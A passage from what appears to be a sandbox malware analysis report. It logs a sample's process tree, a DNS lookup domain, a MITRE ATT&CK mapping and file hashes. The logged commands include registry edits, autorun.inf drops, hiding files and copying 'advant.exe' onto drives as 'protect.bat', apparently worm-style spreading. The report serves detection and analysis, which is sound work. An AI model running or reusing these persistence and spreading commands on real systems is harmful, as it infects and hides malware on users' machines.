C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"4⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"4⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
Network
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse -
DNSredir.metaservices.microsoft.comRemote address:8.8.8.8:53Requestredir.metaservices.microsoft.comIN AResponseredir.metaservices.microsoft.comIN CNAMEredir.metaservices.microsoft.com.edgesuite.netredir.metaservices.microsoft.com.edgesuite.netIN CNAMEa1095.g2.akamai.neta1095.g2.akamai.netIN A173.222.211.58a1095.g2.akamai.netIN A173.222.211.35
-
GEThttp://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409Remote address:173.222.211.58:80RequestGET /redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Host: redir.metaservices.microsoft.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
Date: Sat, 13 Jul 2024 11:45:45 GMT
Connection: keep-alive
-
DNSonlinestores.metaservices.microsoft.comRemote address:8.8.8.8:53Requestonlinestores.metaservices.microsoft.comIN AResponseonlinestores.metaservices.microsoft.comIN CNAMEserviceswitching.metaservices.microsoft.com.edgesuite.netserviceswitching.metaservices.microsoft.com.edgesuite.netIN CNAMEa177.g.akamai.neta177.g.akamai.netIN A92.123.142.201a177.g.akamai.netIN A92.123.140.35
-
GEThttp://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409Remote address:92.123.142.201:80RequestGET /serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: onlinestores.metaservices.microsoft.com
ResponseHTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
ETag: "df03e65b8e082f24dab09c57bc9c6241:1507068277"
Last-Modified: Tue, 03 Oct 2017 22:04:36 GMT
Server: AkamaiNetStorage
Content-Length: 546
Date: Sat, 13 Jul 2024 11:45:45 GMT
Connection: keep-alive
-
GEThttp://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409Remote address:92.123.142.201:80RequestGET /bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Host: onlinestores.metaservices.microsoft.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
ETag: "d58da90d6dc51f97cb84dfbffe2b2300:1507068209"
Last-Modified: Tue, 03 Oct 2017 22:03:27 GMT
Server: AkamaiNetStorage
Content-Length: 523
Date: Sat, 13 Jul 2024 11:45:45 GMT
Connection: keep-alive
-
DNSimages.windowsmedia.comRemote address:8.8.8.8:53Requestimages.windowsmedia.comIN AResponseimages.windowsmedia.comIN CNAMEimages.windowsmedia.com.akadns.netimages.windowsmedia.com.akadns.netIN CNAMEimages.windowsmedia.com.edgesuite.netimages.windowsmedia.com.edgesuite.netIN CNAMEa1076.g.akamai.neta1076.g.akamai.netIN A92.123.142.209a1076.g.akamai.netIN A92.123.143.232
-
GEThttp://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.pngRemote address:92.123.142.209:80RequestGET /svcswitch/mg4_wmp12_30x30_2.png HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Host: images.windowsmedia.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 10 Nov 2008 23:46:38 GMT
Accept-Ranges: bytes
ETag: "a09cf928e43c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 2043
Unused62: 8096267
Cache-Control: max-age=1166703
Date: Sat, 13 Jul 2024 11:45:46 GMT
Connection: keep-alive
-
GEThttp://images.windowsmedia.com/svcswitch/media_guide_16x16.pngRemote address:92.123.142.209:80RequestGET /svcswitch/media_guide_16x16.png HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Host: images.windowsmedia.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 28 Oct 2008 21:02:20 GMT
Accept-Ranges: bytes
ETag: "db34ed774039c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 897
Unused62: 8096267
Cache-Control: max-age=316833
Date: Sat, 13 Jul 2024 11:45:46 GMT
Connection: keep-alive
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
DNSredir.metaservices.microsoft.comRemote address:8.8.8.8:53Requestredir.metaservices.microsoft.comIN AResponseredir.metaservices.microsoft.comIN CNAMEredir.metaservices.microsoft.com.edgesuite.netredir.metaservices.microsoft.com.edgesuite.netIN CNAMEa1095.g2.akamai.neta1095.g2.akamai.netIN A173.222.211.35a1095.g2.akamai.netIN A173.222.211.58
-
GEThttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16Remote address:173.222.211.35:80RequestGET /redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16 HTTP/1.1
Accept: */*
User-Agent: Windows-Media-Player/12.0.7601.17514
Accept-Encoding: gzip, deflate
Host: redir.metaservices.microsoft.com
Connection: Keep-Alive
Pragma: no-cache
ResponseHTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://toc.music.metaservices.microsoft.com/cdinfo/GetMDRCD.aspx?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16
Date: Sat, 13 Jul 2024 11:46:05 GMT
Connection: keep-alive
-
DNStoc.music.metaservices.microsoft.comRemote address:8.8.8.8:53Requesttoc.music.metaservices.microsoft.comIN AResponse
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
DNSkaserskpy.infoRemote address:8.8.8.8:53Requestkaserskpy.infoIN AResponse
-
173.222.211.58:80http://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409http
HTTP Request
GET http://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409HTTP Response
302 -
92.123.142.201:80http://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409http
HTTP Request
GET http://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409HTTP Response
200HTTP Request
GET http://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409HTTP Response
200 -
92.123.142.209:80http://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.pnghttp
HTTP Request
GET http://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.pngHTTP Response
200 -
92.123.142.209:80http://images.windowsmedia.com/svcswitch/media_guide_16x16.pnghttp
HTTP Request
GET http://images.windowsmedia.com/svcswitch/media_guide_16x16.pngHTTP Response
200 -
173.222.211.35:80http://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16http
HTTP Request
GET http://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16HTTP Response
302 -
127.0.0.1:5220 -
127.0.0.1:5220
-
127.0.0.1:5220
-
127.0.0.1:5220
-
127.0.0.1:5220
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53redir.metaservices.microsoft.comdns
DNS Request
redir.metaservices.microsoft.com
DNS Response
173.222.211.58173.222.211.35
-
8.8.8.8:53onlinestores.metaservices.microsoft.comdns
DNS Request
onlinestores.metaservices.microsoft.com
DNS Response
92.123.142.20192.123.140.35
-
8.8.8.8:53images.windowsmedia.comdns
DNS Request
images.windowsmedia.com
DNS Response
92.123.142.20992.123.143.232
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53redir.metaservices.microsoft.comdns
DNS Request
redir.metaservices.microsoft.com
DNS Response
173.222.211.35173.222.211.58
-
8.8.8.8:53toc.music.metaservices.microsoft.comdns
DNS Request
toc.music.metaservices.microsoft.com
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
-
8.8.8.8:53kaserskpy.infodns
DNS Request
kaserskpy.info
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
2Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5fd5fd28e41676618aac733b243ad54db
SHA1b2d69ad6a2e22c30ef1806ac4f990790c3b44763
SHA256a26544648ef8ceffad6c789a3677031be3c515918627d7c8f8e0587d3033c431
SHA5124c32623796679be7066b719f231d08d24341784ecfd5d6461e8140379f5b394216e446865df56e05b5f1e36962c9d34d2b5041275366aeabcd606f4536217fe4
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
25KB
MD5212ddd77efd824768ef4988e5ace6cce
SHA1a4075151428b170d8413960d948165ef501871dd
SHA256c301e161d731d051c30e1b66c8cd9dd1fde1f5fac84895aa55c527bbed92dc41
SHA5127b17253f1c8f37c68e00cf6830c1a62c5fd6617a22c5594ecc76787bef26f0d4632a1a5f3ded86b225ca9270d314f2465037e0c06597e19b3ecd90ab544d896f
-
Filesize
219B
MD53676ba592a32bb9434599226129d6825
SHA18f0612c1bcd02447b2e71268f704fed6d8b94e18
SHA256416ae91ed63c27575f531034919192d8f5263c525c05a775d0948c55f5b43437
SHA51239033c35de4d495584e2d8be606f58e5a07acb4c6f426a757a9f16c1b1ff8015fc9898aee8acd12aa5b768dfdff49e510f4573d48cb2ab08b13b7f2d2eb8a813
-
Filesize
34KB
MD55a630ca16e715633272d3994d4cfe79d
SHA1bc3f62845989685321dfdf568c338103d3fa1e8c
SHA2569a081ff2756d1b9b08538402a2f40b69f86d51b0a305f6d2c2ff29a0496f837e
SHA5120c75b1cff44bf25d234ab072d8dbc488c67bf3610a9be2d1b58c49ede29bf092d015cc79f62545043abdcc3e5aa3798149d40b8210d274c9743bf3b24a36262e
-
Filesize
535B
MD59cac34f332cf836e17fc2f2fa2bb71e4
SHA1d18afa52aeb5e2aa2c6d42bba50a0f7c9910dfb8
SHA256a1454355e66bc7f6d45301b83b1bbfd8b6aa5fd8c53c283f3ae10aba3d8950a7
SHA512b9ab7e6f465c6bcdfca25cd5e3f169771106e70cde4e946d887efc2676558b07eab1a0626b998406262f191f63e782a1a43bcf1e0654a1d7d98995deac534a1b
-
Filesize
441B
MD5fa19559081b4ab5f084f93e66a9d42be
SHA18359e8bfe26390bb9bf36a553d0a59c0db711007
SHA256b23940134fec85d6d0fa7e02e737a9e1ec046a05714b190fb4e70e97b96b989b
SHA512345427a14b9544b8f811017363f8ca9a9f30be2783b7aeb0a1f145c3eadbe73fda7e20276087d4e0cbabd6dff9898ea49cbb23fca5f0875ef1dfc348822102cd
-
Filesize
6KB
MD552470bfd657efe79177539a91a948a19
SHA1f79b34b0fef22b1135cf549c8a7fb90fb1df1fd6
SHA2567301169de6aa1c7adaf7098ee5170f75a93b6abdcd3913495d28d2ed453b5e9d
SHA512eeace7bc54272667a833df733fdf2e3130634852a78088ae6fc5dc732cdc146dcb598f12d8c5e209692b84b7ad51eb958acba4e26f1ded91ed73aee9fed20f64
-
Filesize
315KB
MD52590fd6e112931b0defac0686d5c268e
SHA1cb0663525cc8286d9cba4fa642ca12de55eb9155
SHA25666244c2be9f38702ccb106a5e2e43114f9e113d6ebe2d474e74181afb1490377
SHA5128d41b9e75d8d9424c7452a4449fadf23117b0de04855679df14ef744f1417850ed8a3831750310ae42d1f932249cc1a6d607be046eceb6ed0cd82e065f306374
-
Filesize
191KB
MD511115f56c2ed3c465cb00b2d70281aaf
SHA1a42e36c46bc69a1ce9bb87ef97c262f2d0ac0cb7
SHA256af12acbb0d9e9d74a3f0fa0cd9483020592e277ce5392ec9521e79957043074d
SHA5124caa106ee5008a35350af729ce53f1568df7c9658af6b0dda6e2678a37d33cbf1e460269b94495624b44c0ad4e3fb9c098fb5b346241eedf2819aedf0ad758c6
-
Filesize
63B
MD5f64baf418f685884efec59a9d80bc5f6
SHA19c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9
SHA2564b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f
SHA512dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69
-
Filesize
212KB
-
Filesize
4KB
-
Filesize
376KB
-
Filesize
212KB
